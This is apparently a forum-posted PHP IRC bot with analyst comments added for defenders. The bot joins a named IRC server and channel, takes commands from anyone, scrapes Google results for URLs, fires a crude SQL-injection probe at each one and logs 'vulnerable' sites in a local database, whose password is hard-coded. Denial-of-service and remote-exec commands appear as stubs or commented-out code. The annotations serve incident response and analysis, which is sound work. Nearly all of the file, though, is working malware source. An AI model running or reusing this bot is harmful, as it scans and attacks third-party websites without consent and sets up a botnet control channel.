Код:
<?php
/*
 * Analyst summary (annotation only; every statement below is unchanged).
 *
 * This script is an IRC-controlled bot. After start-up it opens a TCP
 * connection to the server/port in $config, registers a nick, joins
 * $config['chan'] and then loops over lines read from the socket. It acts on
 * PRIVMSG lines whose fourth space-separated token is one of:
 *   :!dos      - only posts a message; no traffic-generating code is present
 *   :!ssh      - posts "Disabled for now"; the commented-out body would have
 *                passed channel-supplied text to exec()
 *   :!sqldork  - runs google() on tokens 4-6 of the line and calls
 *                sqlinject() on every string google() returns
 *   :!sql      - calls sqlinject() on one channel-supplied URL
 *   :!gimme    - reads one row back from the local `vulns` table
 *
 * Points a responder can take from the visible code:
 *   - Control channel: plain-text IRC to the host, port and channel held in
 *     $config. The registration line 'USER bot bot bot :Bot' and the nick
 *     built from $config['prefix'] are fixed strings usable in network
 *     signatures.
 *   - No operator check: $config['master'] is defined but never read, so any
 *     PRIVMSG line that reaches the bot is treated as a command.
 *   - The nick embeds $_SERVER['HTTP_HOST'], which suggests the file is meant
 *     to be requested through a web server (inferred - confirm against web
 *     access logs on the affected host).
 *   - set_time_limit(0) removes the execution time limit; a long-lived PHP
 *     worker holding an outbound socket is a host-side indicator.
 *   - Outbound probes carry the Referer "www.google.com" and a URL cut at the
 *     first "=" with "--" appended; see sqlinject().
 *   - Database credentials are hard-coded in logVuln() and gimme() and should
 *     be treated as exposed.
 *   - The mysql_ extension functions and eregi() were removed in PHP 7.0, so
 *     the script runs unmodified only on PHP 5.x.
 */
set_time_limit(0);
error_reporting(E_ALL);
echo "Go\n";

/**
 * Write $message to the IRC socket as PRIVMSG line(s) addressed to $chan.
 *
 * An array is sent one element per PRIVMSG (each element is also echoed
 * locally); anything else is sent as a single PRIVMSG. The text is
 * concatenated into the protocol line as-is.
 *
 * @param mixed    $message String or array of strings to send.
 * @param string   $chan    PRIVMSG target.
 * @param resource $socket  Stream the line is written to with fputs().
 */
function msg ($message, $chan, $socket) {
    //print_r($message);
    if (is_array($message)) {
        foreach ($message as $line ) {
            echo $line;
            fputs($socket, "PRIVMSG ".$chan." :" . $line . "\n");
        }
    } else {
        fputs($socket, "PRIVMSG ".$chan." :" . $message . "\n");
    }
}

/**
 * Insert a (type, url, finder) row into the local `vulns` table unless a row
 * with the same `url` already exists.
 *
 * NOTE(review): $dbconnect is a function-local variable that is never
 * assigned before the test below, so the connect branch runs on every call.
 * NOTE(review): $chan and $socket are not defined in this scope, so the
 * die(msg(...)) path cannot deliver its message to IRC.
 * NOTE(review): $type, $url and $finder are interpolated straight into the
 * SQL text; $url ultimately comes from scraped pages or IRC input.
 *
 * @param string $url    Probed URL to record.
 * @param string $type   Category label stored in `type`.
 * @param string $finder Value stored in `finder`.
 */
function logVuln ($url, $type, $finder) {
    echo "Log";
    if (!$dbconnect) {
        echo "connect";
        // Hard-coded database account: treat these credentials as disclosed.
        $db_host = "localhost";
        $db_user = "vulnLog";
        $db_pwd = "[8K]cS(zfab)U~C2!-DfC..Ywy";
        $db_name = "vulnLog";
        $dbconnect = mysql_connect($db_host, $db_user, $db_pwd);
        mysql_select_db($db_name) or die(msg("Could connect to SQL DB", $chan, $socket));
    }
    $insert = "INSERT INTO `vulns` ( `type` , `url` , `finder`) VALUES ( '$type', '$url', '$finder' );";
    echo "insert";
    // De-duplicate on `url`: insert only when the lookup returns no rows.
    if (mysql_num_rows(mysql_query("SELECT `id` FROM `vulns` WHERE `url` = '$url';", $dbconnect)) == 0) {
        mysql_query($insert);
        echo "insterted";
    }
}

/**
 * Read one logged entry of the given type back from the `vulns` table.
 *
 * The query selects `url` and `finder` for rows of `type` = $type whose `id`
 * is greater than a random value, limited to three rows, but only the first
 * row is fetched and returned.
 *
 * NOTE(review): $num is never used in the body.
 * NOTE(review): $limit subtracts $type (a channel-supplied token) from the
 * row count; the intent is not clear from the code.
 * NOTE(review): $results (with an "s") is never defined; only $resultz is.
 * NOTE(review): same per-call reconnect and undefined $chan/$socket as in
 * logVuln().
 *
 * @param string $type Value compared against the `type` column.
 * @param mixed  $num  Unused.
 * @return mixed Result of mysql_fetch_assoc() for the first matching row.
 */
function gimme($type, $num) {
    if (!$dbconnect) {
        echo "connect";
        // Same hard-coded database account as in logVuln().
        $db_host = "localhost";
        $db_user = "vulnLog";
        $db_pwd = "[8K]cS(zfab)U~C2!-DfC..Ywy";
        $db_name = "vulnLog";
        $dbconnect = mysql_connect($db_host, $db_user, $db_pwd);
        mysql_select_db($db_name) or die(msg("Could connect to SQL DB", $chan, $socket));
    }
    echo "getting vulns";
    $limit = mysql_num_rows(mysql_query("SELECT `id` FROM `vulns`", $dbconnect)) - $type;
    $select = "SELECT `url`, `finder` FROM `vulns` WHERE `type` = '$type' AND `id` > '" . rand(1, $limit) . "' LIMIT 0 , 3;";
    $resultz = mysql_fetch_assoc(mysql_query($select, $dbconnect));
    print_r($resultz);
    print_r($results);
    print_r($select);
    return $resultz;
}

/**
 * Fetch a google.co.uk results page for $string and return every substring
 * of the response that matches the "www..." pattern in $exp.
 *
 * Each match includes the trailing whitespace character required by the
 * pattern. $gurl is never initialised, so when nothing matches the function
 * returns an undefined variable (null).
 *
 * @param string $string Search query; URL-encoded before the request.
 * @return array|null List of matched strings.
 */
function google ($string) {
    $url = $string; # Save the target as $url.
    $curl = curl_init(); # Start cURL, it will be used to get contents of webpage.
    // Fixed Referer on the outbound request.
    curl_setopt($curl, CURLOPT_REFERER, "www.google.com");
    curl_setopt($curl, CURLOPT_URL, 'http://www.google.co.uk/search?q=' . urlencode( $string));
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
    $return = curl_exec($curl);
    $exp = "/www[a-zA-Z0-9\/=.?]*\s/";
    $numurls = preg_match_all($exp, $return, $urls);
    $x = 0;
    // Copy the full-pattern matches into a fresh 0-based list.
    foreach ($urls[0] as $url ) {
        $gurl[$x] = $url;
        $x++;
    }
    curl_close($curl);
    return($gurl);
}

/**
 * Request a modified form of $url and report whether the response body
 * contains the word "error".
 *
 * The URL is cut at its first "=" and "=--" is appended. If the response
 * matches "error" case-insensitively, the modified URL is passed to
 * logVuln() and "<url> is vuln!" is returned; otherwise "Not vuln".
 *
 * Defender notes:
 *   - The verdict is a bare substring test, so any page that mentions
 *     "error" is logged; entries in `vulns` are not reliable findings.
 *   - In a target's web logs these probes appear as a request whose first
 *     query parameter has the value "--", with the Referer
 *     "www.google.com".
 *   - The cURL handle opened here is not closed in this function.
 *
 * @param string $url URL to probe.
 * @return string Human-readable verdict relayed to IRC by the caller.
 */
function sqlinject ($url) {
    $curl = curl_init(); # Start cURL, it will be used to get contents of webpage.
    curl_setopt($curl, CURLOPT_REFERER, "www.google.com");
    $url = explode ( '=', $url);
    $attack = $url[0] . '=--';
    curl_setopt($curl, CURLOPT_URL, $attack);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
    $return = curl_exec($curl);
    if (eregi("error", $return)) {
        logVuln ($attack, "SQL", "NotCodedYet");
        return $attack . " is vuln!";
    } else return "Not vuln";
}

// Control-channel settings. 'master' is never read anywhere in this script.
$config = array(
    'server'=>'irc.zloche.net',
    'port'=>'6667',
    'master'=>'Orijin4l',
    'prefix'=>'LulZ[',
    'chan'=>'#w4ck1ng',
);
// Nick = prefix + random 1..15 + " ^ " + the Host header of the request that
// started the script.
$nick = $config['prefix'] . rand(1, 15) . " ^ " . $_SERVER['HTTP_HOST'];
echo "Loaded Config - Nick: $nick\n";
// The return value of fsockopen() is not checked before it is used.
$socket = fsockopen( $config['server'] , $config['port'] );
echo "Connected\n";
usleep (10000);
// IRC registration followed by the channel join.
fputs($socket,'USER bot bot bot :Bot' . "\n");
fputs($socket,'NICK ' . $nick . "\n");
echo "Sent Auth Info\n";
fputs($socket, 'JOIN ' . $config['chan'] . "\n" );
// Main loop: one IRC line per iteration until the server closes the stream.
while(!feof($socket)) {
    $data = fgets($socket, 1024);
    flush();
    echo $data;
    // Separate all data
    $ex = explode(' ', $data);
    // Keep-alive: answer the server's PING with the token it sent.
    if($ex[0] == "PING") {
        fputs($socket, "PONG ".$ex[1]."\n");
        echo "Pong\n";
    }
    // Command dispatch. $ex[2] (the PRIVMSG target) is reused as the reply
    // target; $ex[3] is the first word of the message text. The sender
    // prefix in $ex[0] is never inspected.
    if ($ex[1] == "PRIVMSG") {
        switch ($ex[3]) {
            case ':!dos':
                // Announcement only; nothing else happens in this branch.
                msg( 'Im going to DoS ' . $ex[4], $ex[2], $socket );
                break;
            case ':!ssh':
                // Disabled by the author. The commented-out body would have
                // executed channel-supplied text with exec().
                /*
                msg($ex[4], $ex[2], $socket );
                exec(trim($ex[4]) . ' ' . trim($ex[5]) , $return );
                var_dump($return);
                msg($line, $ex[2], $socket );
                unset($return);
                */
                // NOTE(review): third argument is $return, which is not
                // defined here, rather than $socket; the reply is presumably
                // never delivered.
                msg ("Disabled for now", $ex[2], $return);
                break;
            case ':!sqldork':
                // Search phrase = tokens 4-6 of the IRC line.
                $search = $ex[4] . " " . $ex[5] . " " . $ex[6];
                msg ('Running a SQL fuzz on the google of ' . $search, $ex[2], $socket );
                $greturn = google($search);
                msg (count($greturn) . " results loaded", $ex[2], $socket);
                // One outbound probe per extracted string, reported to IRC.
                foreach($greturn as $target) {
                    msg ("Attempting to inject " . $target, $ex[2], $socket);
                    msg (sqlinject($target), $ex[2], $socket);
                }
                msg ("Done Injecting", $ex[2], $socket);
                break;
            case ':!sql':
                // Single probe against the URL given in token 4.
                msg ('Attempting to Inject' . $ex[4], $ex[2], $socket );
                msg (sqlinject($ex[4]), $ex[2], $socket);
                msg ('Done with ' . $ex[4], $ex[2], $socket);
                break;
            case ':!gimme':
                // explode() yields strings, so is_int() is never true and
                // $ex[5] is always overwritten with 3; gimme() ignores its
                // second argument in any case.
                if (!is_int($ex[5])) $ex[5] = 3;
                msg ('Retriving ' . $ex[5] . ' ' . $ex[4] . ' vulns', $ex[2], $socket);
                $gimme = gimme($ex[4], $ex[5]);
                // Iterates the columns of the single row gimme() returns.
                foreach ($gimme as $gimme2) {
                    echo $gimme2;
                    msg($gimme2, $ex[2], $socket);
                }
                break;
        }
    }
}
?>